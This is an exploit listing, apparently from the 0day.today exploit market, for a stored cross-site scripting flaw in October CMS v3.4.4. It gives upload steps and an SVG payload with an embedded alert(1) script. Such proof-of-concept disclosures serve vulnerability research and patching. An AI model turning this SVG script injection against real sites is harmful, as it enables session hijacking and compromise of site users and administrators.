[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

October CMS v3.4.4 - Stored Cross-Site Scripting (Authenticated) Vulnerability

Author
Okan Kurtulus
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-38911
Category
web applications
Date add
28-07-2023
Platform
php
#Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://octobercms.com
#Version: v3.4.4
#Tested on: Ubuntu 22.04
#CVE : N/A

# Proof of Concept:
1– Install the system through the website and log in with any user with file upload authority.
2– Select "Media" in the top menu. Prepare an SVG file using the payload below.
3– Upload the SVG file and call the relevant file from the directory it is in. XSS will be triggered.

#Stored XSS Payload:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(1);
  </script>
</svg>

#  0day.today [2024-11-16]  #